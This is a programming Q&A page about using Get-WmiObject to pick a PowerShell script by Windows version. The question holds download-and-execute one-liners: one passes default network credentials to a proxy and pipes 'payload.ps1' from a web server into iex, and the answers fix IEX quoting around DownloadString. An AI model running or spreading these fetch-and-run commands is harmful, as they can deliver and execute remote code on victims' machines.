Trying to use Get-WmiObject to decide what script to call

Question

(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"

Get Wmi Object Win32 Operating System Default Network Credentials

$host = ((Get-WmiObject Win32_OperatingSystem).Caption)
    if ($host -eq 'Microsoft Windows 7'){

    Write-Host "[+] Downloading windows 7 script"

        $URL = http://example.com
        IEX (New-Object Net.WebClient).DownloadString('$URL')}

elseif ($host -eq 'Microsoft Windows 8'){

        Write-Host "[+] Downloading windows 8 script"

etc...

To debug the issue please provide the output for `$host` and `$host -eq 'Microsoft Windows 7'`. Also there is no else statement in your sample code. — vrdse, Apr 19 '19 at 09:22

score 0 · Answer 1 · answered Apr 19 '19 at 09:24

This happens as $host is an automatic variable. The assignment fails on my system:

$host = ((Get-WmiObject Win32_OperatingSystem).Caption)
Cannot overwrite variable Host because it is read-only or constant.
At line:1 char:1
+ $host = ((Get-WmiObject Win32_OperatingSystem).Caption)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : WriteError: (Host:String) [], SessionStateUnauthorizedAccessException
    + FullyQualifiedErrorId : VariableNotWritable

Try using another a variable name, such as $myHost.

score 0 · Answer 2 · answered Apr 20 '19 at 03:14

From the provided code, in IEX command, add the double quotations to surround because Invoke-Expression's Command parameter accept string, and add the single quotations to surround $URL.

    $URL = "http://example.com"
    IEX "(New-Object Net.WebClient).DownloadString('$URL')"

In Addition, Invoke-Expression shouldn't be necssary to run Net.WebClient, you may simplify as below.

     $URL = "http://example.com"
    (New-Object Net.WebClient).DownloadString($URL)

Trying to use Get-WmiObject to decide what script to call

2 Answers2